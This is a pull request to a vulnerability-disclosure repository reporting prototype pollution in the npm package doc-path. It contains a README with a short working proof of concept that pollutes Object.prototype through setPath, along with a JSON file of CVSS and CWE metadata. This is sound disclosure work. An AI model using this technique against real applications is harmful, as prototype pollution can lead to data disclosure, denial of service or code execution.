### PR TITLE
Prototype Pollution in doc-path

### DIFF
--- a/bounties/npm/doc-path/2/README.md
+++ b/bounties/npm/doc-path/2/README.md
@@ -1,0 +1,30 @@
+# Description
+
+`doc-path` is vulnerable to `Prototype Pollution`.
+
+# Proof of Concept
+
+1. Create the following PoC file:
+```javascript
+// poc.js
+const { setPath } =  require('doc-path')
+
+console.log(`Before: ${{}.polluted}`)
+setPath({}.__proto__, 'polluted', true)
+console.log(`After: ${{}.polluted}`)
+```
+2. Execute the following commands in the terminal:
+```bash
+npm i doc-path # install vulnerable package
+node poc.js # run the PoC
+```
+3. Check the output:
+```
+Before: undefined
+After: true
+```
+
+# Impact
+
+`Prototype Pollution` leads to Information Disclosure/DoS/RCE.
+

--- a/bounties/npm/doc-path/2/vulnerability.json
+++ b/bounties/npm/doc-path/2/vulnerability.json
@@ -1,0 +1,57 @@
+{
+    "PackageVulnerabilityID": "2",
+    "DisclosureDate": "2021-01-15",
+    "AffectedVersionRange": "*",
+    "Summary": "Prototype Pollution",
+    "Contributor": {
+        "Discloser": "arjunshibu",
+        "Fixer": ""
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "doc-path",
+        "URL": "https://www.npmjs.com/package/doc-path",
+        "Downloads": "27256"
+    },
+    "CWEs": [
+        {
+            "ID": "471",
+            "Description": "Modification of Assumed-Immutable Data (MAID)"
+        }
+    ],
+    "CVSS": {
+        "Version": "3.1",
+        "AV": "N",
+        "AC": "L",
+        "PR": "N",
+        "UI": "N",
+        "S": "U",
+        "C": "L",
+        "I": "L",
+        "A": "L",
+        "E": "",
+        "RL": "",
+        "RC": "",
+        "Score": "5.6"
+    },
+    "CVEs": [
+        ""
+    ],
+    "Repository": {
+        "URL": "https://github.com/mrodrig/doc-path",
+        "Codebase": [
+            "JavaScript"
+        ],
+        "Owner": "mrodrig",
+        "Name": "doc-path"
+    },
+    "Permalinks": [
+        ""
+    ],
+    "References": [
+        {
+            "Description": "",
+            "URL": ""
+        }
+    ]
+}


### PR DESCRIPTION
# Description

`doc-path` is vulnerable to `Prototype Pollution`.

# Proof of Concept

1. Create the following PoC file:
```javascript
// poc.js
const { setPath } =  require('doc-path')

console.log(`Before: ${{}.polluted}`)
setPath({}.__proto__, 'polluted', true)
console.log(`After: ${{}.polluted}`)
```
2. Execute the following commands in the terminal:
```bash
npm i doc-path # install vulnerable package
node poc.js # run the PoC
```
3. Check the output:
```
Before: undefined
After: true
```

# Impact

`Prototype Pollution` leads to Information Disclosure/DoS/RCE.

## :white_check_mark: Checklist

* [x]  _Created and populated the `README.md` and `vulnerability.json` files_

* [x]  _Provided the repository URL and any applicable permalinks_

* [x]  _Defined all the applicable weaknesses (CWEs)_

* [x]  _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_

* [x]  _Checked that the vulnerability affects the latest version of the package released_

* [x]  _Checked that a fix does not currently exist that remediates this vulnerability_

* [x]  _Complied with all applicable laws_